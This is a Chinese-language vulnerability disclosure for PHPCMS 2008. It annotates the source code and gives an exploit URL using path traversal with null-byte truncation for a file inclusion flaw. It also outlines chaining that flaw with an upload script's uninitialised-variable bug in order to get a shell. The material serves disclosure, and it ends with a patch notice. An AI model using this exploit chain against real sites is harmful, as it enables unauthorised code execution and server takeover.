###文件包含
<?php
define('IN_YP', TRUE);
define('ADMIN_ROOT', str_replace("\\", '/',dirname(__FILE__)).'/');
require '../include/common.inc.php';
## 要登陆
if(!$_userid) showmessage('您还没有登陆,即将跳转到登陆页面',$MODULE['member']['url'].'login.php?forward='.urlencode(URL));
session_start();
## $file变量可控制
if(!isset($file) || empty($file)) $file = 'panel';
/* $company_user_infos 获取企业会员信息 */
$company_user_infos = $db->get_one("SELECT * FROM `".DB_PRE."member_company` WHERE `userid`='$_userid'");
$userid = $_userid;
## 注册的时候选择企业用户
if(!$company_user_infos)
{
$MS['title'] = '您不是企业会员';
$MS['description'] = '你可以做下面操作';
$MS['urls'][0] = array(
'name'=>'免费升级为企业会员',
'url'=>$PHPCMS['siteurl'].$M['url'].'company.php?action=member',
);
$MS['urls'][1] = array(
'name'=>'退出当前帐号,换其他帐号登陆',
'url'=>$PHPCMS['siteurl'].'member/logout.php',
);
$MS['urls'][2] = array(
'name'=>'重新注册为企业会员',
'url'=>$PHPCMS['siteurl'].'member/logout.php?forward='.urlencode($PHPCMS['siteurl'].'member/register.php'),
);
msg($MS);
}
$CATEGORY = subcat('yp');
$siteurl = company_url($userid, $company_user_infos['sitedomain']);
$_SESSION['url'] = QUERY_STRING;
if($file != 'company' && $M['enableSecondDomain'] && !$company_user_infos['sitedomain']) showmessage('请先绑定您的二级域名',BUSINESSDIR.'?file=company');
check_priv($file);
$GROUP = cache_read('member_group.php');
## 此处直接包含了,注意$file是可以控制的但须要截断
if(!@include ADMIN_ROOT.$file.'.inc.php') showmessage('The file ./yp/'.$file.'.inc.php is not exists!');
function check_priv($file)
{
global $M,$PHPCMS,$_groupid;
if(!$M["allow_add_$file"]) return true;
if(!in_array($_groupid,$M["allow_add_$file"]))
{
$MS['title'] = '您所在的会员组没有此项操作权限';
$MS['description'] = '你可以做下面操作';
$MS['urls'][0] = array(
'name'=>'升级会员组',
'url'=>$PHPCMS['siteurl'].'member/upgrade.php',
);
$MS['urls'][1] = array(
'name'=>'返回商务中心',
'url'=>'?',
);
msg($MS);
}
}
?>
## 利用注册一个企业用户
EXP:http://localhost/phpcms/yp/business/?file=../../xxoo.txt%00.
由于涉及截断,所以鸡肋了,哥是要去拿shell的。
## 再看这一句
if(!@include ADMIN_ROOT.$file.'.inc.php') showmessage('The file ./yp/'.$file.'.inc.php is not exists!');
以.inc.php结尾的文件有大把随便找个有漏的文件包含进来,不就能二次利用了?
## 首先进入视线的是/admin/upload.inc.php 看名字就知道如果能利用的话,将会.....(省略500字)
<?php
defined('IN_PHPCMS') or exit('Access Denied');
require_once 'attachment.class.php';
$attachment = new attachment($mod);
if($catid)
{
$C = cache_read('category_'.$catid.'.php');
}
## 允许上传的后缀是从$C里取的,变量$C要通过上面那个判断才能赋值,典型的变量未初始化
$upload_allowext = $C['upload_allowext'] ? $C['upload_allowext'] : UPLOAD_ALLOWEXT;
$upload_maxsize = $C['upload_maxsize'] ? $C['upload_maxsize'] : UPLOAD_MAXSIZE;
if($dosubmit)
{
$attachment->upload('uploadfile', $upload_allowext, $upload_maxsize, 1);
if($attachment->error) showmessage($attachment->error());
//判断是否开启附件ftp上传,返回图片路径
$imgurl = UPLOAD_FTP_ENABLE ? $attachment->uploadedfiles[0]['filepath'] : UPLOAD_URL.$attachment->uploadedfiles[0]['filepath'];
$aid = $attachment->uploadedfiles[0]['aid'];
$filesize = $attachment->uploadedfiles[0]['filesize'];
$filesize = $attachment->size($filesize);
if($isthumb || $iswatermark)
{
require_once 'image.class.php';
$image = new image();
$img = UPLOAD_ROOT.$attachment->uploadedfiles[0]['filepath'];
if($isthumb)
{
$image->thumb($img, $img, $width, $height);
}
if($iswatermark)
{
$image->watermark($img, $img, $PHPCMS['watermark_pos'], $PHPCMS['watermark_img'], '', 5, '#ff0000', $PHPCMS['watermark_jpgquality']);
}
}
showmessage("文件上传成功!<script language='javascript'> try{ $(window.opener.document).find(\"form[@name='myform'] #$uploadtext\").val(\"$imgurl\");$(window.opener.document).find(\"form[@name='myform'] #{$uploadtext}_aid\").val(\"$aid\");$(window.opener.document).find(\"form[@name='myform'] #$filesize\").val(\"$filesize\");}catch(e){} window.close();</script>", HTTP_REFERER);
}
else
{
include admin_tpl('upload');
}
?>
0
phpcms 2008
厂商补丁:
PHPCMS
-------
目前厂商已经提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.phpcms.cn/
京公网安备 11010502034610号
暂无评论